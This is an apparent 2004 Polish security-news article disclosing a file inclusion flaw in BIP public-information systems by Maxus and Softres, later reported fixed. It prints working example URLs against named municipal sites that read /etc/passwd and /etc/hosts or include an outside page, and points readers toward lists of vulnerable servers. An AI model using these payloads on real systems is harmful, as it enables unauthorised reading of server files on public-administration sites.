W ostatniej wersji systemu BIP służącego do publikacji i obsługi Biuletynu Informacji Publicznej dla jednostek administracji publicznej występuje błąd, który pozwala na wyświetlenie bądź podglądnięcie większości plików znajdujących się na serwerze.
Problem dotyczy błędnego wczytania informacji, jakie przekazywane są przez zmienną "script=" w systemie BIP/G firmy Maxus oraz przez zmienną "page=" w systemie BIP firmy Softres. Zmienne te wykonują kod z określonego pliku w trakcie wykonywania skryptu.
A zatem wystarczy, że w zmiennej "script=" bądź "page=" (w zależności od systemu BIP) wpiszemy np. /etc/passwd co spowoduje, że na stronie wyświetli się zawartość tego pliku bądź, jak to bywa w takich przypadkach, można bardzo łatwo wyświetlenia inną stronę www.
Dla przykładu korzystając z systemu BIP firmy Softres można wywołać dowolny plik bądź adres www w następujący sposób:
http://www.medyka.itl.pl/bip/index2.php?page=/etc/passwd
http://www.hyzne.itl.pl/bip/index2.php?page=/etc/hosts
http://www.powiat-lancut.itl.pl/bip/index2.php?page=http://hacking.pl
Lista BIP podatnych na wyżej wymieniony błąd dostępna jest tutaj, natomiast osoby zainteresowane wersją BIP/G mogą skorzystać z dobrodziejstwa, jakim jest wyszukiwarka Google i tam poszukać serwerów działających z systemem BIP.
Aktualizacja: (2004-04-16 17:08): Opisywany błąd w systemie BIP został poprawiony.
Systemy BIP z błędami
Zabezpieczenia |
Pt, 16 Kwie 2004 23:27:15 +0200 |
Autor:
Redakcja
| Czytań: 5186
Top 20 news
Komentarze
Najaktywniejsi
1
Rellik 9640 pkt.
2
grzemach 870 pkt.
3
betaKondor 470 pkt.
4
Koras 350 pkt.
5
Localghost 140 pkt.
6
kris2005a 140 pkt.
7
elmocamp 100 pkt.
8
Tommy 100 pkt.
9
Scoti 80 pkt.
10
sevar 60 pkt.
W tej chwili nie ma jeszcze komentarzy. Możesz jednak dodać swój własny.
Aby dodawać komentarze musisz się zalogować.